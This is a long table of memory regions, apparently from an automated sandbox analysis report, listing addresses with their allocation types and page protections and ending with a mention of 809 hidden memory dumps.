||
346A000
|
heap
|
page read and write
|
||
3354000
|
heap
|
page read and write
|
||
2FA0000
|
direct allocation
|
page read and write
|
||
3319000
|
heap
|
page read and write
|
||
3660000
|
heap
|
page read and write
|
||
7BD0000
|
direct allocation
|
page read and write
|
||
611000
|
heap
|
page read and write
|
||
7930000
|
trusted library allocation
|
page execute and read and write
|
||
5402000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2397C000
|
heap
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
5D9000
|
heap
|
page read and write
|
||
83F0000
|
trusted library allocation
|
page execute and read and write
|
||
7B5D000
|
heap
|
page read and write
|
||
2FD8000
|
heap
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
7C10000
|
direct allocation
|
page read and write
|
||
656000
|
heap
|
page read and write
|
||
7B5D000
|
heap
|
page read and write
|
||
4FC0000
|
trusted library allocation
|
page read and write
|
||
237A3000
|
heap
|
page read and write
|
||
332E000
|
heap
|
page read and write
|
||
6F66000
|
remote allocation
|
page execute and read and write
|
||
5D2000
|
heap
|
page read and write
|
||
23F30000
|
unclassified section
|
page execute and read and write
|
||
7690000
|
heap
|
page read and write
|
||
7714000
|
heap
|
page read and write
|
||
485F000
|
stack
|
page read and write
|
||
31A3000
|
heap
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
A3F000
|
stack
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
536C000
|
heap
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
751E000
|
stack
|
page read and write
|
||
409000
|
unkown
|
page read and write
|
||
5360000
|
trusted library allocation
|
page read and write
|
||
755E000
|
stack
|
page read and write
|
||
49F0000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
23811000
|
heap
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
26FC000
|
stack
|
page read and write
|
||
30C5000
|
heap
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
5F5000
|
heap
|
page read and write
|
||
491A000
|
trusted library allocation
|
page execute and read and write
|
||
79C0000
|
trusted library allocation
|
page read and write
|
||
5D9000
|
heap
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
3325000
|
heap
|
page read and write
|
||
7B80000
|
direct allocation
|
page read and write
|
||
672000
|
heap
|
page read and write
|
||
4E80000
|
heap
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
618000
|
heap
|
page read and write
|
||
78A0000
|
heap
|
page read and write
|
||
4920000
|
trusted library allocation
|
page read and write
|
||
2225000
|
heap
|
page read and write
|
||
28D9000
|
heap
|
page read and write
|
||
4F1F000
|
stack
|
page read and write
|
||
7B5C000
|
heap
|
page read and write
|
||
5FE9000
|
trusted library allocation
|
page read and write
|
||
7F210000
|
trusted library allocation
|
page execute and read and write
|
||
76F7000
|
heap
|
page read and write
|
||
3321000
|
heap
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
8AB0000
|
trusted library allocation
|
page read and write
|
||
333A000
|
heap
|
page read and write
|
||
409000
|
unkown
|
page write copy
|
||
335A000
|
heap
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
2D00000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
5657000
|
heap
|
page read and write
|
||
6566000
|
remote allocation
|
page execute and read and write
|
||
2E20000
|
heap
|
page read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
647000
|
heap
|
page read and write
|
||
23710000
|
heap
|
page read and write
|
||
333C000
|
heap
|
page read and write
|
||
3421000
|
heap
|
page read and write
|
||
2317F000
|
stack
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
6009000
|
trusted library allocation
|
page read and write
|
||
3333000
|
heap
|
page read and write
|
||
337C000
|
heap
|
page read and write
|
||
432000
|
unkown
|
page read and write
|
||
3398000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
5F4000
|
heap
|
page read and write
|
||
780E000
|
stack
|
page read and write
|
||
78EE000
|
stack
|
page read and write
|
||
3319000
|
heap
|
page read and write
|
||
7990000
|
trusted library allocation
|
page read and write
|
||
2EB0000
|
heap
|
page read and write
|
||
2EF0000
|
direct allocation
|
page read and write
|
||
8545000
|
trusted library allocation
|
page read and write
|
||
333A000
|
heap
|
page read and write
|
||
7BE0000
|
direct allocation
|
page read and write
|
||
335B000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
3356000
|
heap
|
page read and write
|
||
847D000
|
stack
|
page read and write
|
||
784E000
|
stack
|
page read and write
|
||
4F9E000
|
stack
|
page read and write
|
||
68B000
|
heap
|
page read and write
|
||
23810000
|
heap
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
83E0000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
71F1000
|
heap
|
page read and write
|
||
222D000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
49F7000
|
heap
|
page read and write
|
||
4868000
|
heap
|
page read and write
|
||
4DE0000
|
trusted library allocation
|
page read and write
|
||
3068000
|
heap
|
page read and write
|
||
3460000
|
heap
|
page read and write
|
||
78A5000
|
heap
|
page read and write
|
||
5F4000
|
heap
|
page read and write
|
||
235FF000
|
stack
|
page read and write
|
||
2FFC000
|
heap
|
page read and write
|
||
3321000
|
heap
|
page read and write
|
||
28DA000
|
heap
|
page read and write
|
||
7A70000
|
heap
|
page read and write
|
||
3323000
|
heap
|
page read and write
|
||
2F80000
|
direct allocation
|
page read and write
|
||
5360000
|
trusted library allocation
|
page read and write
|
||
2F28000
|
heap
|
page read and write
|
||
23903000
|
heap
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
67D000
|
stack
|
page read and write
|
||
2F3F000
|
stack
|
page read and write
|
||
2150000
|
heap
|
page read and write
|
||
2F20000
|
direct allocation
|
page read and write
|
||
5F4000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
333C000
|
heap
|
page read and write
|
||
B0B6000
|
direct allocation
|
page execute and read and write
|
||
612000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
7711000
|
heap
|
page read and write
|
||
2C5C000
|
stack
|
page read and write
|
||
2A7C000
|
stack
|
page read and write
|
||
77C0000
|
trusted library allocation
|
page read and write
|
||
A7E000
|
stack
|
page read and write
|
||
5E5000
|
heap
|
page read and write
|
||
3321000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
4940000
|
trusted library allocation
|
page read and write
|
||
230D0000
|
direct allocation
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
502C000
|
heap
|
page read and write
|
||
792D000
|
stack
|
page read and write
|
||
2353D000
|
stack
|
page read and write
|
||
771D000
|
heap
|
page read and write
|
||
3476000
|
heap
|
page read and write
|
||
5166000
|
remote allocation
|
page execute and read and write
|
||
337C000
|
heap
|
page read and write
|
||
5E5000
|
heap
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
7B68000
|
heap
|
page read and write
|
||
3580000
|
heap
|
page read and write
|
||
BCF000
|
stack
|
page read and write
|
||
68F000
|
heap
|
page read and write
|
||
642000
|
heap
|
page read and write
|
||
2B70000
|
heap
|
page read and write
|
||
3686000
|
heap
|
page read and write
|
||
88F6000
|
heap
|
page read and write
|
||
7AF9000
|
heap
|
page read and write
|
||
237CC000
|
heap
|
page read and write
|
||
237F4000
|
heap
|
page read and write
|
||
21AE000
|
stack
|
page read and write
|
||
3476000
|
heap
|
page read and write
|
||
2B6E000
|
unkown
|
page read and write
|
||
32A0000
|
trusted library section
|
page read and write
|
||
2F60000
|
heap
|
page read and write
|
||
3469000
|
heap
|
page read and write
|
||
3440000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
344F000
|
heap
|
page read and write
|
||
2337C000
|
stack
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
7C60000
|
direct allocation
|
page read and write
|
||
27F0000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
8862000
|
heap
|
page read and write
|
||
5617000
|
trusted library allocation
|
page read and write
|
||
5E5000
|
heap
|
page read and write
|
||
331E000
|
heap
|
page read and write
|
||
23811000
|
heap
|
page read and write
|
||
23F8C000
|
unclassified section
|
page execute and read and write
|
||
5010000
|
heap
|
page read and write
|
||
88E5000
|
heap
|
page read and write
|
||
32B8000
|
heap
|
page read and write
|
||
7680000
|
trusted library allocation
|
page read and write
|
||
7A50000
|
direct allocation
|
page read and write
|
||
3378000
|
heap
|
page read and write
|
||
3469000
|
heap
|
page read and write
|
||
3334000
|
heap
|
page read and write
|
||
49D0000
|
heap
|
page readonly
|
||
4CA1000
|
heap
|
page read and write
|
||
91B0000
|
direct allocation
|
page execute and read and write
|
||
3358000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
5021000
|
heap
|
page read and write
|
||
7BE000
|
stack
|
page read and write
|
||
2F00000
|
direct allocation
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
7D36000
|
heap
|
page read and write
|
||
6CD000
|
stack
|
page read and write
|
||
434000
|
unkown
|
page readonly
|
||
474000
|
unkown
|
page readonly
|
||
874C000
|
stack
|
page read and write
|
||
331B000
|
heap
|
page read and write
|
||
8850000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
503F000
|
trusted library allocation
|
page read and write
|
||
69E000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
61D000
|
heap
|
page read and write
|
||
3325000
|
heap
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
3442000
|
heap
|
page read and write
|
||
5E9000
|
heap
|
page read and write
|
||
7B5C000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
5E5000
|
heap
|
page read and write
|
||
7C00000
|
direct allocation
|
page read and write
|
||
2B2F000
|
stack
|
page read and write
|
||
233BE000
|
stack
|
page read and write
|
||
7BB0000
|
direct allocation
|
page read and write
|
||
23789000
|
heap
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
8A60000
|
trusted library allocation
|
page read and write
|
||
407000
|
unkown
|
page readonly
|
||
4EDE000
|
stack
|
page read and write
|
||
3311000
|
heap
|
page read and write
|
||
2343B000
|
stack
|
page read and write
|
||
4CA1000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
28DF000
|
heap
|
page read and write
|
||
232DF000
|
stack
|
page read and write
|
||
7AF6000
|
heap
|
page read and write
|
||
7A4B000
|
stack
|
page read and write
|
||
2380000
|
heap
|
page read and write
|
||
331E000
|
heap
|
page read and write
|
||
786E000
|
stack
|
page read and write
|
||
2F30000
|
direct allocation
|
page read and write
|
||
333E000
|
heap
|
page read and write
|
||
7D0D000
|
stack
|
page read and write
|
||
4E10000
|
heap
|
page read and write
|
||
23F09000
|
unclassified section
|
page execute and read and write
|
||
2902000
|
heap
|
page read and write
|
||
643000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
79A0000
|
trusted library allocation
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
23660000
|
direct allocation
|
page read and write
|
||
234BC000
|
stack
|
page read and write
|
||
23807000
|
heap
|
page read and write
|
||
7AEE000
|
heap
|
page read and write
|
||
3680000
|
heap
|
page read and write
|
||
3348000
|
heap
|
page read and write
|
||
3334000
|
heap
|
page read and write
|
||
5360000
|
trusted library allocation
|
page read and write
|
||
344F000
|
heap
|
page read and write
|
||
337C000
|
heap
|
page read and write
|
||
7B70000
|
direct allocation
|
page read and write
|
||
4AD0000
|
heap
|
page read and write
|
||
7B64000
|
heap
|
page read and write
|
||
32EF000
|
stack
|
page read and write
|
||
2333C000
|
stack
|
page read and write
|
||
2BDF000
|
stack
|
page read and write
|
||
334F000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
3378000
|
heap
|
page read and write
|
||
2B14000
|
heap
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
3327000
|
heap
|
page read and write
|
||
5536000
|
heap
|
page read and write
|
||
84C0000
|
heap
|
page read and write
|
||
27CF000
|
stack
|
page read and write
|
||
230F0000
|
direct allocation
|
page read and write
|
||
62A000
|
heap
|
page read and write
|
||
23711000
|
heap
|
page read and write
|
||
333E000
|
heap
|
page read and write
|
||
4F50000
|
heap
|
page execute and read and write
|
||
2BD0000
|
heap
|
page read and write
|
||
239DA000
|
heap
|
page read and write
|
||
429000
|
unkown
|
page read and write
|
||
2F20000
|
heap
|
page read and write
|
||
7B5B000
|
heap
|
page read and write
|
||
3325000
|
heap
|
page read and write
|
||
8852000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
7070000
|
direct allocation
|
page read and write
|
||
335B000
|
heap
|
page read and write
|
||
655000
|
heap
|
page read and write
|
||
2E00000
|
heap
|
page read and write
|
||
2EC0000
|
heap
|
page read and write
|
||
2EB4000
|
heap
|
page read and write
|
||
3335000
|
heap
|
page read and write
|
||
77A9000
|
heap
|
page read and write
|
There are 809 hidden memdumps, click here to show them.